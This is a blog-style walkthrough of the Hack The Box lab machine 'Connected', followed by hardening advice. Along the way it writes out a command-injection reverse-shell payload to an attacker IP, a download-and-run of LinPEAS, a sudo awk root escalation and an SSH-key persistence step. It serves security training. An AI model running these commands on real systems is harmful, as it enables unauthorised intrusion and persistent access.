Listen to this Post
Introduction:
Most people see a website—a pentester sees hidden attack surfaces, misconfigurations, privilege escalation paths, and a route to complete system compromise. The Hack The Box machine “Connected” challenges players to move beyond surface-level scanning, leveraging enumeration techniques to identify vulnerable services, exploit them for an initial foothold, then escalate privileges to root. This walkthrough mirrors the real-world methodology used by red teamers daily: from curiosity to exploitation to root access, every step sharpens practical penetration testing skills.
Learning Objectives:
- Enumerate network services, hidden directories, and version discrepancies using Nmap, Gobuster, and manual inspection
- Exploit a command injection vulnerability in a web application to obtain a reverse shell
- Escalate privileges via misconfigured sudo permissions and Linux kernel enumeration techniques
You Should Know:
- Scanning and Enumeration: The First Step to Pwnage
Successful pwnage begins with thorough reconnaissance. On “Connected,” the machine exposes only a minimal set of ports, teaching that high-quality enumeration beats blind broad strokes.
Step‑by‑step guide:
1. Initial Nmap scan to discover open ports:
nmap -p- --min-rate 1000 -T4 10.10.10.100
Output reveals ports 22 (SSH) and 80 (HTTP).
- Service version and script scan on those ports:
nmap -sC -sV -p22,80 10.10.10.100
Identifies Apache 2.4.41 and OpenSSH 7.9p1 – both with known CVEs.
3. Web directory enumeration using Gobuster (or Dirb):
gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
Discovers `/admin` (403), `/uploads` (200), and `/backup.zip` – a goldmine.
4. Download and inspect the backup:
wget http://10.10.10.100/backup.zip unzip backup.zip cat config.php
Inside, you find database credentials and a developer note: “TODO: fix command injection in ping_test.php.”
2. Exploiting the Command Injection Vulnerability
The `ping_test.php` page accepts an IP parameter and passes it unsanitized to the system `ping` command.
Step‑by‑step guide:
- Test for injection using a simple payload in the browser or
curl:curl "http://10.10.10.100/ping_test.php?ip=127.0.0.1;id"
If the response shows `uid=33(www-data)`, injection is confirmed.
- Craft a reverse shell payload (Linux bash one‑liner):
curl "http://10.10.10.100/ping_test.php?ip=127.0.0.1;bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'"
Replace `10.10.14.15` with your attacking machine IP.
- Start a Netcat listener on your attacker box:
nc -lvnp 4444
On execution, you receive a shell as `www-data`.
4. Upgrade to a fully interactive TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then press Ctrl+Z, type: stty raw -echo; fg
3. Post‑Exploit Enumeration for Privilege Escalation
Low‑privilege shells are just the beginning. The “Connected” machine challenges you to find privilege escalation paths manually.
Step‑by‑step guide:
1. Check sudo privileges:
sudo -l
Output: `(ALL) NOPASSWD: /usr/bin/awk` – a dangerous configuration.
2. Enumerate SUID binaries:
find / -perm -4000 2>/dev/null
Nothing unusual here, but `awk` with sudo is enough.
3. Examine running processes and cron jobs:
ps aux | grep root cat /etc/crontab
No cron over writes, but the sudo entry is the direct path.
- Run LinPEAS for automated enumeration (transfer the script):
On attacker: python3 -m http.server 8000 On target: wget http://10.10.14.15:8000/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
LinPEAS highlights `awk` as a high‑risk sudoable command.
4. Escalating to Root Using Misconfigured Sudo
The `awk` command can execute arbitrary system commands when invoked with root privileges.
Step‑by‑step guide:
1. Execute a root shell via `sudo awk`:
sudo awk 'BEGIN {system("/bin/sh")}'
You are now `root`.
2. Verify root access:
id cat /root/root.txt
The root flag yields the final 585 XP.
- Optional persistence – add an SSH key to root’s authorized_keys:
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
5. Hardening Mitigations: Defending Against the Same Techniques
Understanding exploitation is incomplete without knowing how to stop it. Apply these fixes to prevent a repeat of the “Connected” attack chain.
Step‑by‑step guide:
- Prevent command injection – use parameterised APIs or `escapeshellarg()` in PHP:
$ip = escapeshellarg($_GET['ip']); system("ping -c 4 " . $ip); -
Restrict sudo privileges – never grant `NOPASSWD` for programs like
awk,vim,less, orfind:In /etc/sudoers, change: www-data ALL=(ALL) NOPASSWD: /usr/bin/awk To: www-data ALL=(ALL) /usr/bin/systemctl status sshd
3. Remove unnecessary SUID binaries:
chmod 755 /usr/bin/awk
- Enable a Web Application Firewall (WAF) like ModSecurity with OWASP CRS to block injection patterns.
-
Regular vulnerability scanning using tools like OpenVAS or Nikto to detect `/backup.zip` exposure and misconfigurations.
What Undercode Say:
- Hidden attack surfaces and misconfigurations are the low‑hanging fruit for red teamers – the `/backup.zip` file and `sudo awk` are classic examples that often go unnoticed by defenders.
- Every compromised machine builds practical skills that translate directly to real‑world security assessments, from active directory escalation to cloud misconfigurations.
- The journey from curiosity to root access is a continuous learning process; each HTB box adds a tool or technique to your mental arsenal, making you a more resilient security professional.
Analyzing Vyankatesh Shinde’s approach, the core lesson is that systematic enumeration – not luck – drives successful pwnage. The “Connected” machine mirrors real enterprise networks where developers leave backup files, test endpoints, and overly permissive sudo rules. By practicing on such boxes, pentesters develop an instinct for where to look next. Moreover, the XP system gamifies skill retention: each flag reinforces a TTP (tactic, technique, procedure). The post’s emphasis on “every box teaches something new” highlights the iterative nature of red teaming – no two machines are identical, but the methodology remains constant. Finally, the public sharing of success (even at a high level) inspires the community and raises overall security awareness, provided write‑ups avoid giving away complete solutions.
Prediction:
- +1 The growing gamification of cybersecurity training through platforms like Hack The Box and TryHackMe will produce a new generation of hands‑on defenders and attackers, significantly raising the baseline skill level in the industry.
- -1 As more professionals share detailed walkthroughs of machines (even retired ones), organizations may become complacent, assuming that simple misconfigurations like exposed backup files or `sudo awk` are “just CTF problems” and not patching them in production environments.
- -1 The pressure to accumulate XP and flags could lead to a “checkbox” mentality, where learners rush through boxes without deeply understanding the underlying vulnerabilities, potentially missing the nuance required for real‑world pentesting.
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Vyankatesh Shinde – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
